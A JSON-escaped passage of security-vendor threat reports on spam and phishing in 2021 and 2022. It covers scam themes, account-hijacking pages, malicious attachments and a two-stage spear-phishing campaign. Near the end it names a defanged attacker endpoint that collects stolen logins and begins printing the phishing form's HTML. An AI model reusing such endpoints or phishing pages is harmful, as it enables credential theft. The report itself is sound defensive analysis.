trading platforms \u2014 such sites traditionally mushroom ahead of the festive frenzy. Corporate users too should remain sharp-eyed \u2014 even a congratulatory e-mail seemingly from a partner may be phishing for confidential information.\n\nThe COVID-19 topic will still be hot in the next quarter. The fourth wave of the pandemic, vaccinations and the introduction of COVID passports in many countries will surely give rise to new malicious mailings. Also be on the lookout for websites offering compensation payments: if previous quarters are anything to go by, cybercriminals will continue to find new and enticing ways to lure their victims.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-01T12:00:26", "type": "securelist", "title": "Spam and phishing in Q3 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2021-11-01T12:00:26", "id": "SECURELIST:48D15DFCBE9043594D59B08C3C4F3A21", "href": "https://securelist.com/spam-and-phishing-in-q3-2021/104741/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-16T08:14:22", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/14165025/sl-email-spam-binary-code-data-abstract-1200-990x400.jpg)\n\n## Figures of the year\n\nIn 2022:\n\n * 48.63% of all emails around the world and 52.78% of all emails in the Russian segment of the internet were spam\n * As much as 29.82% of all spam emails originated in Russia\n * Kaspersky Mail Anti-Virus blocked 166,187,118 malicious email attachments\n * Our Anti-Phishing system thwarted 507,851,735 attempts to follow phishing links\n * 378,496 attempts to follow phishing links were associated with Telegram account hijacking\n\n## Phishing in 2022\n\n### Last year's resonant global events\n\nThe year 2022 saw cybercrooks try to profit from new film releases and premieres just as they always have. The bait included the most awaited and talked-about releases: the new season of Stranger Things, the new Batman movie, and the Oscar nominees. Short-lived phishing sites often offered to see the premieres before the eagerly awaited movie or television show was scheduled to hit the screen. Those who just could not wait were in for a disappointment and a waste of cash. The promises of completely free access to the new content were never true. By clicking what appeared to be a link to the movie, the visitor got to view the official trailer or a film studio logo. Several seconds into the "preview", the stream was interrupted by an offer to buy an inexpensive subscription right there on the website to continue watching. If the movie lover entered their bank card details on the fake site, they risked paying more than the displayed amount for content that did not exist and sharing their card details with the scammers.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132238/spam-phishing-report-2022-01-1024x546.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132238/spam-phishing-report-2022-01.png>)\n\nSome websites that offered soccer fans free broadcasts of the FIFA World Cup in Qatar employed a similar scheme, but the variety of hoaxes aimed at soccer fans proved to be wider than that used by scammers who attacked film lovers. Thus, during the World Cup a brand-new scam appeared: it offered users to win a newly released iPhone 14 for predicting match outcomes. After answering every question, the victim was told that they were almost there, but there was a small commission to be paid before they could get their gadget. Of course, no prize ensued after the fee was paid.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132326/spam-phishing-report-2022-02-1024x427.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132326/spam-phishing-report-2022-02.jpg>)\n\nSoccer fans chasing merchandise risked compromising their bank cards or just losing some money. Scammers created websites that offered souvenirs at low prices, including rare items that were out of stock in legitimate online stores. Those who chose to spend their money on a shady website risked never getting what they ordered.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132414/spam-phishing-report-2022-03-1024x413.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132414/spam-phishing-report-2022-03.jpg>)\n\nWebsites that offered tickets to the finals were another type of soccer-flavored bait. Scammers were betting on the finals typically being the most popular stage of the competition, tickets to which are often hard to get. Unlike legitimate ticket stores, the fake resellers were showing available seats in every sector even when the World Cup was almost closed. Vast selection of available seats should have alarmed visitors: real tickets would have been largely gone.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132716/spam-phishing-report-2022-04-1024x474.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132716/spam-phishing-report-2022-04.png>)\n\nFake donation sites started popping up after the Ukraine crisis broke out in 2022, pretending to accept money as aid to Ukraine. These sites referenced public figures and humanitarian groups, offering to accept cash in cryptocurrency, something that should have raised a red flag in itself.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132903/spam-phishing-report-2022-05-1024x607.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132903/spam-phishing-report-2022-05.png>)\n\n### The pandemic\n\nThe COVID-19 theme had lost relevance by late 2022 as the pandemic restrictions had been lifted in most countries. At the beginning of that year, we still observed phishing attacks that used the themes of infection and prevention as the bait. For example, one website offered users to obtain a COVID vaccination certificate by entering their British National Health Service (NHS) account credentials. Others offered the coveted Green Pass without vaccination.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13141812/spam-phishing-report-2022-06-1024x653.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13141812/spam-phishing-report-2022-06.png>)\n\nScammers abused legitimate survey services by creating polls in the name of various organization to profit from victims' personal, including sensitive, data. In another COVID-themed scheme, the con artists introduced themselves as the Direct Relief charity, which helps to improve the quality of life and healthcare in poorer regions. Visitors were offered to fill out a form to be eligible for $750 per week in aid for twenty-six weeks. The survey page said the "charity" found the victim's telephone number in a database of individuals affected by COVID-19. Those who wished to receive the "aid" were asked to state their full name, contact details, date of birth, social security and driver's license numbers, gender, and current employer, attaching a scanned copy of their driver's license. To lend an air of authenticity and to motivate the victim to enter valid information, the swindlers warned that the victim could be prosecuted for providing false information. The scheme likely aimed at identity theft: the illegal use of others' personal details for deriving profit. The cybercrooks might also use the data to contact their victims later, staging a more convincing swindle.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13141841/spam-phishing-report-2022-07-1024x741.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13141841/spam-phishing-report-2022-07.png>)\n\n### Crypto phishing and crypto scams\n\nThe unabated popularity of cryptocurrency saw crypto scammers' interest in wallet owners' accounts growing, despite the fact that rates continued to drop throughout the year. Cybercriminals chased seed phrases, used for recovering access to virtual funds. By getting the user's secret phrase, cybercriminals could get access to their cryptocurrency balance.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13141926/spam-phishing-report-2022-08-1024x748.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13141926/spam-phishing-report-2022-08.png>)\n\nIn a typical internet hoax manner, crypto scam sites offered visitors to get rich quick by paying a small fee. Unlike common easy-money scams, these websites asked for payments in cryptocurrency \u2014 which they promised to give away and which they were trying to steal. The "giveaways" were timed to coincide with events that were directly or indirectly associated with cryptocurrency. Thus, one of the fake sites promised prizes on the occasion of Nvidia thirty-year anniversary (the company is a major vendor of graphics processing units, which are sometimes used for crypto mining). Promotion of cryptocurrency use was another pretext for the "giveaways". Users were offered to deposit up to 100 cryptocurrency units for a promise to refund two times that amount, purportedly to speed up digital currency adoption. In reality, the scheme worked the way any other internet hoax would: the self-professed altruists went off the radar once they received the deposit.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142443/spam-phishing-report-2022-09-1024x457.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142443/spam-phishing-report-2022-09.png>)\n\n### Compensation, bonus, and paid survey scams\n\nBonuses and compensations are hard to deny in times of crisis and instability, but it is worth keeping in mind that "financial assistance" is frequently promised by con artists to swindle you out of your money.\n\n"Promotional campaigns by major banks" were a popular bait in 2022. Visitors to a fraudulent web page were offered to receive a one-time payment or to take a service quality survey for a fee. Unlike the prizes offered in the aforementioned crypto schemes, these fees were smaller: an equivalent of $30\u201340. The cybercriminals used an array of techniques to lull victims' vigilance: company logos, assurances that the campaigns were legit, as well as detailed, lifelike descriptions of the offer. Similar "campaigns" were staged in the name of other types of organizations, for example, the Polish finance ministry.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142523/spam-phishing-report-2022-10-1024x511.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142523/spam-phishing-report-2022-10.png>)\n\nAid as distributed by various governmental and nongovernmental organizations remained a popular fraud theme in 2022. For example, in Muslim countries, scammers promised to send charity packages, purportedly under a "Ramadan Relief" program that aimed at helping low-income families during the Ramadan fast. The fasting period typically sees higher prices for food and household products, whereas observers buy more than they normally do and may be faced with a shortage of money. Legitimate charities, such as [WF-AID](<https://wfaid.org/rrf/>), do operate Ramadan relief programs, and judging by the screenshot below, the fraudsters were pretending to represent that organization. An eye-catching picture of the organization's logo and huge boxes was accompanied by a list of foodstuffs included in the aid package, with positive "recipient feedback" posted below the message. The victim was asked to make sure that their name was on the list of recipients, so they could get a package. This required providing personal data on the website and sending a link to the scam site to instant messaging contacts\u2014nothing extraordinary for hoaxes like this. This way, the scammers both populate their databases and have victims spread links to their malicious resources for them. In addition to that, they might ask the victim to cover the "shipping costs".\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142600/spam-phishing-report-2022-11-992x1024.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142600/spam-phishing-report-2022-11.png>)\n\nGrowing utility rates and an increase in the price of natural resources have prompted several governments to start discussing compensations for the population. Payout notices could arrive by mail, email, or as a text message. Cybercriminals attempted to take advantage of the situation by creating web pages that mimicked government websites, promising cash for covering utility payments or compensation of utility expenses. Visitors were occasionally asked to provide personal details under the pretext of checking that they were eligible, or simply to fill out a questionnaire. In Britain, con artists posing as a government authority promised to compensate electricity costs. The description of the one-time payout was copied from the official website of the authority, which did provide the type of compensation. After completing the questionnaire, the victim was asked to specify the electric utility whose services they were using and enter the details of the bank card linked to their account with the utility. The promise of \u00a3400 was supposed to make the victim drop their guard and share their personal information.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142636/spam-phishing-report-2022-12-1024x434.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142636/spam-phishing-report-2022-12.png>)\n\nIn Singapore, scammers offered a refund of water supply costs, purportedly because of double billing. An energy or resource crisis was not used as a pretext in this particular case, but refunds were still offered in the name of the water supply authority.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142706/spam-phishing-report-2022-13-1024x810.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142706/spam-phishing-report-2022-13.png>)\n\n### Fake online stores and large vendor phishing\n\nWe see fake websites that imitate large online stores and marketplaces year after year, and 2022 was no exception. Phishing attacks targeted both the customers of globally known retailers and regional players. An attack often started with the victim receiving a link to a certain product supposedly offered at an attractive price, by email, in an instant messaging app, or on a social network. Those who fell for the trick could lose access to their accounts, have their bank card details stolen, or waste the money they wanted to spend on the dirt-cheap item.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142737/spam-phishing-report-2022-14-1024x515.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142737/spam-phishing-report-2022-14.png>)\n\n"Insides" about "private sales" were also used as a lure. Thus, a web page that copied the appearance of a Russian marketplace promised discounts of up to 90% on all items listed on it. The page design did look credible, with the only potential red flags being really low prices and the URL in the address bar not matching the official one.\n\nMany large vendors, notably in the home appliances segment, announced in early spring that they would be pulling out of Russia, which caused a spike in demand. This was reflected in the threat landscape, with fake online stores offering home appliances popping up all over the Russian segment of the internet (also called Runet). Large retailers being out of stock, combined with unbelievably low prices, made these offers especially appealing. The risk associated with making a purchase was to lose a substantial amount of money and never to receive what was ordered.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142817/spam-phishing-report-2022-15-1024x665.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142817/spam-phishing-report-2022-15.jpg>)\n\n### Hijacking of social media accounts\n\nUsers of social media have increasingly focused on privacy lately. That said, curiosity is hard to contain: people want to check out who has been following them, but do so without the other party knowing. Cybercriminals who were after their account credentials offered victims to have their cake and eat it by using some new social media capability. A fake Facebook Messenger page promised to install an update that could change the user's appearance and voice during video calls, and track who has been viewing their profile, among other features. To get the "update", the victim was asked to enter their account credentials, which the scammers immediately took over.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142852/spam-phishing-report-2022-16.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142852/spam-phishing-report-2022-16.png>)\n\nMany Instagram users dream about the Blue Badge, which stands for verified account and is typically reserved for large companies or media personalities. Cybercriminals decided to take advantage of that exclusivity, creating phishing pages that assured visitors their verified status had been approved and all they needed to do was to enter their account logins and passwords.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142919/spam-phishing-report-2022-17-1024x263.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142919/spam-phishing-report-2022-17.png>)\n\nRussia blocked access to both Facebook and Instagram in March 2022, which led to the popularity of Russian social networks and Telegram skyrocketing. This increased usage meant the users' risk of losing personal data was now higher, too. "Well-wishers" who operated scam sites offered to check if Russian social media contained any embarrassing materials on the victim. The scam operators told the users it was possible to find damaging information about every third user of a social network by running a search. If the user agreed to a search to be done for them, they were told that a certain amount of dirty linen indeed had been found. In reality, there was no search \u2014 the scammers simply stole the credentials they requested for the check.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142944/spam-phishing-report-2022-18-1024x295.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142944/spam-phishing-report-2022-18.png>)\n\nOne of the added risks of social media phishing is scammers getting access to both the social media account itself and any linked services.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143155/spam-phishing-report-2022-19.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143155/spam-phishing-report-2022-19.png>)\n\nThe Telegram Premium status provides a range of benefits, from an ad-free experience to an ability to block incoming voice messages, but the subscription costs money. Scammers offered to "test" a Premium subscription free of charge or simply promised to give one for free if the victim entered their Telegram user name and password or a verification code sent by the service, which was exactly what the cybercrooks were after.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143228/spam-phishing-report-2022-20-EN.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143228/spam-phishing-report-2022-20-EN.png>)\n\nOne more phishing campaign targeting Telegram users was arranged to coincide with the New Year's celebration. Scammers created a page on the telegra.ph blogging platform that posted a gallery of children's drawings, encouraging users to vote for their favorites. Scammers sent a link to that page from hacked accounts, asking users to vote for their friends' kids' works. Those who took the bait were directed to a fake page with a login form on it. The cybercriminals were betting on the users to go straight to voting, without checking the authenticity of the drawings, which had been copied from various past years' competition pages, as requests to vote for one's friends' kids are common before public holidays.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143725/spam-phishing-report-2022-21.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143725/spam-phishing-report-2022-21.jpg>)\n\nThe Telegram auction platform named Fragment went live in the October of 2022: it was selling unique usernames. You can become a user by linking your Telegram account or TON wallet. Scammers who were after those account details sent out links to fake Fragment pages. A visitor who tried to buy a username from the fake website was requested to log in. If the victim entered their credentials, the scam operators immediately grabbed those.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143807/spam-phishing-report-2022-22-1024x726.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143807/spam-phishing-report-2022-22.png>)\n\n## Spam in 2022\n\n### The pandemic\n\nUnlike phishing, COVID-themed spam is still a thing. Most of that is "Nigerian-type" scams: millionaires dying from COVID bequeathing their money to treatment and prevention efforts, and to improve the lives of those who have recovered, or Mark Zuckerberg running a special COVID lottery where one can win a million euros even if they are not a Facebook user. Recipients are told that they could claim some IMF money left unallocated because of the pandemic. Others are offered hefty amounts under an anti-recession assistance program.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143915/spam-phishing-report-2022-23-1024x452.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143915/spam-phishing-report-2022-23.png>)\n\nThe amount of spam exploiting the coronavirus theme in some way dropped noticeably during 2022: at the beginning of the year, we were blocking a million of these emails per month, but the figure had shrunk by three times by yearend.\n\n### Contact form spam\n\nThe year 2022 saw cybercriminals abuse contact forms for spam more frequently. In a typical scheme of this kind, scammers find websites that offer registration, contact, or support request forms that do not require the user to be logged in to submit, and do not check the data entered. In some cases, they insert a scam message with a hyperlink in the login or name fields, and in others, add a longer text with images to the message field. Then the attackers add victims' email addresses to the contact fields and submit. When getting a message via a registration or contact form, most websites reply to the user's email address that their request was received and is being processed, their account has been created, and so on. As a result, the person gets an automated reply from an official address of a legitimate organization, containing unsolicited advertisements or a scam link.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13144349/spam-phishing-report-2022-24-1024x433.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13144349/spam-phishing-report-2022-24.png>)\n\nMost scam messages offer a compensation or prize to the recipient. For example, a spam email targeting Russian users promised an equivalent of $190\u20134200 in VAT refunds. To get the money, the victim was offered to open the link in the message. This scheme is a classic: a linked web page requests that the user pay a commission of under a dozen dollars, which is insignificant in comparison to the promised refund. We observed many varieties of contact form money scam: from fuel cards to offers to make money on some online platform.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13145016/spam-phishing-report-2022-25-1024x890.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13145016/spam-phishing-report-2022-25.png>)\n\nScammers took advantage of forms on legitimate sites all around the world. Where spam email in Russian typically played on "prizes" or "earning money", messages in other languages, in addition to offering "prizes", encouraged users to visit "dating sites" \u2014 in fact, populated by bots \u2014 where the victims would no doubt be asked to pay for a premium account.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150322/spam-phishing-report-2022-26-1024x727.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150322/spam-phishing-report-2022-26.png>)\n\nWe blocked upward of a million scam emails sent via legitimate forms in 2022.\n\n### Blackmail in the name of law enforcement agencies\n\nExtortion spam is nothing new. In such emails, attackers usually claim that the recipient has broken the law and demand money. In 2022, these mailings not only continued, but also evolved. For example, there was virtually no text in the messages: the user was either asked to open an attached PDF file to find out more, or they received threats in the form of an image with text. In addition, the geography of mailings widened in 2022.\n\nThe essence of the message, as in similar emails sent earlier, was that a criminal case was going to be opened against the recipient due to allegedly visiting sites containing child pornography.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150404/spam-phishing-report-2022-27-1024x560.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150404/spam-phishing-report-2022-27.png>)\n\nTo avoid serious consequences, the attackers urged the victim to respond as soon as possible to the sender and "settle the matter". Most likely, the scammers would ask for a certain amount of money to be paid in further correspondence for the victim's name to be removed from the "criminal case". In 2022, we blocked over 100,000 blackmail emails in various countries and languages, including French, Spanish, English, German, Russian and Serbian.\n\n### Exploiting the news\n\nSpammers constantly use major world events in their fraudulent schemes. The 2022 geopolitical crisis was no exception. Throughout the year, we saw mailings aimed at English-speaking users proposing transferring money, usually to a Bitcoin wallet, to help the victims of the conflict in Ukraine. Scammers often demand the transfer of money to Bitcoin wallets, as it is more difficult to trace the recipient through cryptocurrency transactions than through the bank ones. Blackmail demanding payment in cryptocurrency used to prevail in spam. Now, attackers have started collecting Bitcoin for charity.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150431/spam-phishing-report-2022-28.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150431/spam-phishing-report-2022-28.png>)\n\nThe news agenda was also used in other scam mailings. For example, in early July, our solutions blocked 300,000 emails where fraudsters were requesting help on behalf of a Russian millionaire, who allegedly wanted to invest money and avoid sanctions. Another mailing said that the European Commission had decided to give away a fund created by Russian oligarchs, and the email recipient might be lucky to get a piece of this pie.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150458/spam-phishing-report-2022-29-1024x328.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150458/spam-phishing-report-2022-29.jpg>)\n\nMore and more "business offers" are appearing among spam mailings, and they exploit the current information agenda. Due to economic sanctions in 2022, enterprising businessmen offered replacements for goods and services from suppliers who left the Russian market. For example, spammers actively advertised services of a company transporting people to Russia. The email text emphasized the fact that many transport companies refused to provide such services.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153541/spam-phishing-report-2022-30-1024x477.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153541/spam-phishing-report-2022-30.png>)\n\nThere were also spam mailings where various companies offered to replace popular international software with Russian equivalents or solutions developed in third countries. In addition, there were spam propositions for intermediary services to open a company or bank account in neighboring countries, such as Armenia, as well as offers of assistance in accepting payments from foreign partners.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153600/spam-phishing-report-2022-31-1024x586.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153600/spam-phishing-report-2022-31.png>)\n\nThe shortage of printer paper in Russia in March and April 2022 spawned a wave of related ads offering paper at discount prices.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153622/spam-phishing-report-2022-32-1024x366.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153622/spam-phishing-report-2022-32.png>)\n\nSpammers in 2022 also actively marketed their promotional mailing services as alternative advertising to unavailable promotion via platforms such as Instagram. For example, in April we blocked around a million of such mailings.\n\nAgainst the backdrop of sanctions and the accompanying disruption of supply chains, there has been an increase in spam offering goods and services from Chinese suppliers. In 2022, our filter blocked more than 3.5 million emails containing such offers, and the number of them was growing, from around 700,000 in the first quarter to more than a million in the fourth.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153708/spam-phishing-report-2022-33-1024x571.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153708/spam-phishing-report-2022-33.png>)\n\n### Spam with malicious attachments\n\nEmployees shifting to remote work during the pandemic and the associated growth of online communications spurred the active development of various areas of phishing, both mass and targeted. Attackers have become more active in imitating business correspondence, not only targeting HR-specialists and accountants, as before the pandemic, but also employees in other departments. In 2022, we saw an evolution of malicious emails masquerading as business correspondence. Attackers actively used social engineering techniques in their emails, adding signatures with logos and information from specific organizations, creating a context appropriate to the company's profile, and applying business language. They also actively exploited off the current news agenda and mentioned real employees from the company supposedly sending the emails. Spammers faked their messages as internal company correspondence, business correspondence between different organizations, and even as notifications from government agencies.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153731/spam-phishing-report-2022-34-1024x508.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153731/spam-phishing-report-2022-34.png>)\n\nMasking malicious emails as business correspondence has become a major trend in malicious spam in 2022. Attackers tried to convince the recipient that it was a legitimate email, such as a commercial offer, a request for the supply of equipment, or an invoice for the payment of goods. For example, throughout the year, we encountered the following scheme. Attackers gained access to real business correspondence (most likely by stealing correspondence from previously infected computers) and sent malicious files or links to all of its participants in response to the previous email. This trick makes it harder to keep track of malicious emails, and the victim is more likely to fall for it.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153756/spam-phishing-report-2022-35-1024x626.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153756/spam-phishing-report-2022-35.png>)\n\nIn most cases, either the [Qbot](<https://securelist.com/qakbot-technical-analysis/103931/>) Trojan or [Emotet](<https://securelist.com/emotet-modules-and-recent-attacks/>) was loaded when the malicious document was opened. Both can be used to steal user data, collect information about the corporate network, and spread additional malware, such as ransomware. Qbot also allows you to gain access to emails and steal them for further attacks.\n\nMailings imitating notifications from various ministries and other government organizations have become more frequent in the Runet. Emails were often designed to take into account the specific activities of the organizations they were pretending to be. The sender's addresses copied the logic of email addresses in the relevant agencies, and the malicious attachment was disguised as some kind of specialized document, such as "key points of the meeting". For example, malicious code was found in one of these mailings that exploited a vulnerability in the Equation Editor module, the formula editor in Microsoft Office.\n\nThe perpetrators did not ignore the news agenda. In particular, the malware was distributed under the guise of call-up "as part of partial mobilization" or as a "new solution" to safeguard against possible threats on the internet "caused by hostile organizations".\n\nIn the second case, the program installed on victim's computer was in fact a crypto-ransomware Trojan.\n\n## Two-stage spear phishing using a known phish kit\n\nIn 2022, we saw an increase in spear (or targeted) phishing attacks targeting businesses around the world. In addition to typical campaigns consisting of one stage, there were attacks in several stages. In the first email, scammers in the name of a potential client asked the victim to specify information about its products and services. After the victim responds to this email, the attackers start a phishing attack.\n\nKey facts:\n\n * Attackers use fake Dropbox pages created using a well-known phishing kit\n * The campaign targets the sales departments of manufacturers and suppliers of goods and services\n * Attackers use SMTP IP addresses and _From_ domains provided by Microsoft Corporation and Google LLC (Gmail)\n\n### Statistics\n\nThe campaign began in April 2022, with malicious activity peaking in May, and ended by June.\n\n_Number of emails related to a two-step targeted campaign detected by Kaspersky solutions ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161029/01-en-spam-report-2022-diagrams.png>))_\n\n### How a phishing campaign unfolds\n\nAttackers send an email in the name of a real trade organization requesting more information about the victim company's products. The email text looks plausible and has no suspicious elements, such as phishing links or attachments. A sender's email address from a free domain, like gmail.com, may raise doubts. The email on the screenshot below is sent from an address in this domain, and the company name in the _From_ field is different to its name in the signature.\n\n[![Example of the first email](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153835/spam-phishing-report-2022-36-1024x498.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153835/spam-phishing-report-2022-36.jpg>)\n\n**_Example of the first email_**\n\nIt is worth noting that the use of free domains is not typical for spear phishing in the name of organizations, because such domains are rarely used in business. Most often in targeted attacks, attackers either use [spoofing of the legitimate domain](<https://securelist.com/email-spoofing-types/102703/>) of the organization they are pretending to be, or register domains similar to the original one. In addition, Google and Microsoft are pretty quick in blocking email addresses spotted sending spam. This is the most likely reason why attackers used different addresses in the _From_ header (where the email came from) and _Reply-to_ header (where the reply will go when clicking "Reply" in your email client). This means the victim responds to another address, which may be located in another free domain, such as outlook.com. The address in the _Reply-to_ header is not used for spam, and correspondence with it is initiated by the victim, so it is less likely to be blocked quickly.\n\nAfter victims respond to a first email, attackers send a new message, asking them to go to a file-sharing site and view a PDF file with a completed order, which can be found via the link.\n\n[![An email with a phishing link](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153858/spam-phishing-report-2022-37-1024x642.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153858/spam-phishing-report-2022-37.jpg>)\n\n**_An email with a phishing link_**\n\nBy clicking the link, the user is taken to a fake site generated by a well-known phishing kit. It is a fairly simple tool that generates phishing pages to steal credentials from specific resources. Our solutions blocked fake WeTransfer and Dropbox pages created with this kit.\n\n[![A fake WeTransfer page created using the same phish kit as the target campaign sites](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153925/spam-phishing-report-2022-38-1024x625.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153925/spam-phishing-report-2022-38.jpg>)\n\n**_A fake WeTransfer page created using the same phish kit as the target campaign sites_**\n\nIn the phishing campaign described above, the phishing site mimics a Dropbox page with static file images and a download button. After clicking any element of the interface, the user is taken to a fake Dropbox login page that requests valid corporate credentials.\n\n[![A fake Dropbox page](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153950/spam-phishing-report-2022-39-1024x650.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153950/spam-phishing-report-2022-39.png>)\n\n**_A fake Dropbox page_**\n\n[![Login page with a phishing form](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13154022/spam-phishing-report-2022-40.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13154022/spam-phishing-report-2022-40.jpg>)\n\n**_Login page with a phishing form_**\n\nWhen victims attempt to log in, their usernames and passwords are sent to https://pbkvklqksxtdrfqkbkhszgkfjntdrf[.]herokuapp[.]com/send-mail.\n \n \n <form name=\"loginform\">\n <div class=\"form-group\">\n <label for=\"\">Email Address</label>\n <input 